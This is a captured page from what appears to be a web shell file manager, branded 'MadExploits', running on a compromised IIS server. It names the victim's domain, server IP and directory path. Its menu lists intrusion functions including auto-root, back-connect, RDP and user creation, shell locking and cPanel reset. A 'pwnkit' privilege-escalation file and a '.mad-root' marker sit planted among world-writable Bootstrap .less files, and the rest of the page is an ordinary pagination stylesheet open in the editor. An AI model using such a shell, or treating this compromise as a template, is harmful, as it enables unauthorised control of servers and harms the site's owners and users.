Windows NT 5XH5ME 10.0 build 17763 (Windows Server 2016) AMD64
Microsoft-IIS/10.0
: | : 18.227.190.182
Cant Read [ /etc/named.conf ]
8.0.30
IWPD_574(rhy10449)
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
D: /
Inetpub /
vhosts /
rhythmmedical.in /
httpdocs /
superadm /
bower_components /
bootstrap /
less /
[ HOME SHELL ]
Name
Size
Permission
Action
mixins
[ DIR ]
drwxrwxrwx
.csscomb.json
7.91
KB
-rw-rw-rw-
.csslintrc
456
B
-rw-rw-rw-
.mad-root
0
B
-rw-rw-rw-
alerts.less
1.48
KB
-rw-rw-rw-
badges.less
1.17
KB
-rw-rw-rw-
bootstrap.less
1.26
KB
-rw-rw-rw-
breadcrumbs.less
594
B
-rw-rw-rw-
button-groups.less
5.55
KB
-rw-rw-rw-
buttons.less
3.58
KB
-rw-rw-rw-
carousel.less
5.52
KB
-rw-rw-rw-
close.less
764
B
-rw-rw-rw-
code.less
1.37
KB
-rw-rw-rw-
component-animations.less
666
B
-rw-rw-rw-
dropdowns.less
4.76
KB
-rw-rw-rw-
forms.less
15.45
KB
-rw-rw-rw-
glyphicons.less
19.34
KB
-rw-rw-rw-
grid.less
1.35
KB
-rw-rw-rw-
input-groups.less
4.18
KB
-rw-rw-rw-
jumbotron.less
1.13
KB
-rw-rw-rw-
labels.less
1.05
KB
-rw-rw-rw-
list-group.less
3.05
KB
-rw-rw-rw-
media.less
900
B
-rw-rw-rw-
mixins.less
1.11
KB
-rw-rw-rw-
modals.less
3.44
KB
-rw-rw-rw-
navbar.less
14.29
KB
-rw-rw-rw-
navs.less
4.81
KB
-rw-rw-rw-
normalize.less
7.38
KB
-rw-rw-rw-
pager.less
861
B
-rw-rw-rw-
pagination.less
2.01
KB
-rw-rw-rw-
panels.less
6.13
KB
-rw-rw-rw-
popovers.less
3.41
KB
-rw-rw-rw-
print.less
1.89
KB
-rw-rw-rw-
progress-bars.less
1.88
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
responsive-embed.less
546
B
-rw-rw-rw-
responsive-utilities.less
4.16
KB
-rw-rw-rw-
scaffolding.less
2.92
KB
-rw-rw-rw-
tables.less
4.5
KB
-rw-rw-rw-
theme.less
8
KB
-rw-rw-rw-
thumbnails.less
753
B
-rw-rw-rw-
tooltip.less
2.92
KB
-rw-rw-rw-
type.less
5.81
KB
-rw-rw-rw-
utilities.less
747
B
-rw-rw-rw-
variables.less
26.83
KB
-rw-rw-rw-
wells.less
527
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pagination.less
// // Pagination (multiple pages) // -------------------------------------------------- .pagination { display: inline-block; padding-left: 0; margin: @line-height-computed 0; border-radius: @border-radius-base; > li { display: inline; // Remove list-style and block-level defaults > a, > span { position: relative; float: left; // Collapse white-space padding: @padding-base-vertical @padding-base-horizontal; line-height: @line-height-base; text-decoration: none; color: @pagination-color; background-color: @pagination-bg; border: 1px solid @pagination-border; margin-left: -1px; } &:first-child { > a, > span { margin-left: 0; .border-left-radius(@border-radius-base); } } &:last-child { > a, > span { .border-right-radius(@border-radius-base); } } } > li > a, > li > span { &:hover, &:focus { z-index: 2; color: @pagination-hover-color; background-color: @pagination-hover-bg; border-color: @pagination-hover-border; } } > .active > a, > .active > span { &, &:hover, &:focus { z-index: 3; color: @pagination-active-color; background-color: @pagination-active-bg; border-color: @pagination-active-border; cursor: default; } } > .disabled { > span, > span:hover, > span:focus, > a, > a:hover, > a:focus { color: @pagination-disabled-color; background-color: @pagination-disabled-bg; border-color: @pagination-disabled-border; cursor: @cursor-disabled; } } } // Sizing // -------------------------------------------------- // Large .pagination-lg { .pagination-size(@padding-large-vertical; @padding-large-horizontal; @font-size-large; @line-height-large; @border-radius-large); } // Small .pagination-sm { .pagination-size(@padding-small-vertical; @padding-small-horizontal; @font-size-small; @line-height-small; @border-radius-small); }
Close